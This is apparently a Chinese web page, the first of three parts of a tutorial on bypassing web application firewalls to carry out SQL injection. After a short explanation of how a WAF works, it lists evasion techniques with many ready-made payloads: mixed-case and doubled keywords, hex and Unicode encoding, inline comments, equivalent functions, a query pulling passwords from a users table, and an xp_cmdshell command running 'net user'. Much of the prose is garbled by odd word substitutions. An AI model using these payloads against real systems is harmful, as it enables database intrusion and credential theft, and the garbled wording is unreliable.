沙龙晃荡 | 3月31日 京东、微博拭魅战专家与你合营商量容器技巧实践！

这里我把非字母数字的字符都规在了特别符号一类，特别符号有特别的含义和用法。

Web应用法度榜样防火墙(WAF)的重要感化是过滤，监控和阻拦各类进出Web应用法度榜样的HTTP流量。WAF差别于惯例防火墙，因为WAF可以或许过滤特定Web应用法度榜样的内容，而惯例防火墙充当的则是办事器之间的安然门。经由过程检查HTTP流量，它可以防止源自Web应用安然马脚的进击，如SQL注入，XSS，文件包含和安然设备缺点。

page.php?id=1%252f%252a*/UNION%252f%252a /SELECT 

‘se’+’lec’+’t’   
%S%E%L%E%C%T 1   
1.aspx?id=1;EXEC(‘ma’+'ster..x’+'p_cm’+'dsh’+'ell ”net user”’)  
' or --+2=- -!!!'2   
 　 id=1+(UnI)(oN)+(SeL)(EcT) 

WAF是若何工作的?

• 协定异常检测：谢毫不相符HTTP标准的请求
• 加强的输入验证：代劳和办事器端验证，而不仅仅是客户端验证
• 白名单和黑名单
• 基于规矩和基于异常的保护：基于规矩的更依附黑名单机制，基于异常则更灵活
• 状况治理：存眷会话保护还有：Cookie保护，反入侵规避技巧，响应监控和信息披露保护。

若何绕过WAF?

1. 当我们在目标URL进行SQL注入测试时，可以经由过程修改注入语句中字母的大年夜小写来触发WAF保护情况。如不雅WAF应用区分大年夜小写的黑名单，则更改大年夜小写可能会帮我们成功绕过WAF的过滤。

http://target.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4

6. 应用特别符号

2. 关键字调换(在关键字中心可插入将会被WAF过滤的字符) – 例如SELECT可插入变成SEL

http://target.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4

3. 编码

+Hex encode

target.com/index.php?page_id=-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4…  
　SELECT(extractvalue(0x3C613E61646D696E3C2F613E,0x2f61)) 

+Unicode encode

?id=10%D6‘%20AND%2201=2%23   
　SELECT 'Ä'='A'; #1 

4. 应用注释

在进击字符串中插入注释。例如，/*!SELECT*/ 如许WAF可能就会忽视该字符串，但它仍会被传递给目标应用法度榜样并交由mysql数据库处理。

index.php?page_id=-15 %55nION/**/%53ElecT 1,2,3,4　   
　'union%a0select pass from users#  
index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3   
　?page_id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4… 

5. 某些函数或敕令，因为WAF的过滤机制导致我们无法应用。那么，我们也可以测验测验用一些等价函数来替代它们。

hex()、bin() ==> ascii()   
sleep() ==>benchmark()   
concat_ws()==>group_concat() 
 substr((select 'password'),1,1) = 0x70   
　strcmp(left('password',1), 0x69) = 1   
   strcmp(left('password',1), 0x70) = 0 	
			
 1/3    1 2 3 下一页 尾页
	
			

　　推荐阅读
　　直觉与情怀，2018年移动应用UI设计的九大趋势
以前几年中，越来越多的设计师开端在UI设计中使悠揭捉?色渐变，大年夜logo、按钮到全部移动APP的UI都是如斯。仅仅经由过程对色彩色阶的应用，就能生成漂亮，层次丰富并且耐看的UI，浓烈而不掉简约，这种设计风格注定>>>详细阅读


本文标题：SQL注入 | 9种绕过Web应用程序防火墙的方式
地址：http://www.17bianji.com/lsqh/40568.html
 1/2    1